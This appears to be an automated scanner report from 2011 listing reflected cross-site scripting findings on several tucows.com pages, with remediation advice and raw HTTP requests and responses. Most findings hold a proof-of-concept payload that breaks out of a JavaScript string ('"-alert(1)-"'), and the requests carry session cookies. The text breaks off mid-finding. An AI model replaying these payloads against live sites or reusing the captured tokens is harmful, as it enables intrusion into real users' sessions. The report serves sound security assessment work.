Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.tucows.com/ [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2e8a"-alert(1)-"2f831598e8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?e2e8a"-alert(1)-"2f831598e8d=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:24 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84400
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f530"-alert(1)-"6001743e8c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about.html8f530"-alert(1)-"6001743e8c7 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:11 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.3. http://www.tucows.com/about.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/about.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf95a"-alert(1)-"9164bc1eed8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about.html?cf95a"-alert(1)-"9164bc1eed8=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:27 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 32110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5253"-alert(1)-"eb5b61b7f5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advertise.htmla5253"-alert(1)-"eb5b61b7f5a HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:04 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.5. http://www.tucows.com/advertise.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/advertise.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff349"-alert(1)-"f7b0a9fb104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advertise.html?ff349"-alert(1)-"f7b0a9fb104=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:35 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 31529
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5278d"-alert(1)-"005c7cc4526 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /affiliate5278d"-alert(1)-"005c7cc4526/index.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:15 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dd2c"-alert(1)-"15b6c2e9e37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /affiliate/index.html5dd2c"-alert(1)-"15b6c2e9e37 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:33 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.8. http://www.tucows.com/affiliate/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/affiliate/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91153"-alert(1)-"4395b206045 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /affiliate/index.html?91153"-alert(1)-"4395b206045=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:38 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 33162
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffad2"-alert(1)-"0aea99c7693 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /author_ratings.htmlffad2"-alert(1)-"0aea99c7693 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:02 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.10. http://www.tucows.com/author_ratings.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/author_ratings.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 509d3"-alert(1)-"fb9a5a72368 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /author_ratings.html?509d3"-alert(1)-"fb9a5a72368=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:27 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 34722
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72c33"-alert(1)-"30d1cfe8a9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contact.html72c33"-alert(1)-"30d1cfe8a9a HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:03 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.12. http://www.tucows.com/contact.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/contact.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c10ba"-alert(1)-"8abc5e611cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contact.html?c10ba"-alert(1)-"8abc5e611cd=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
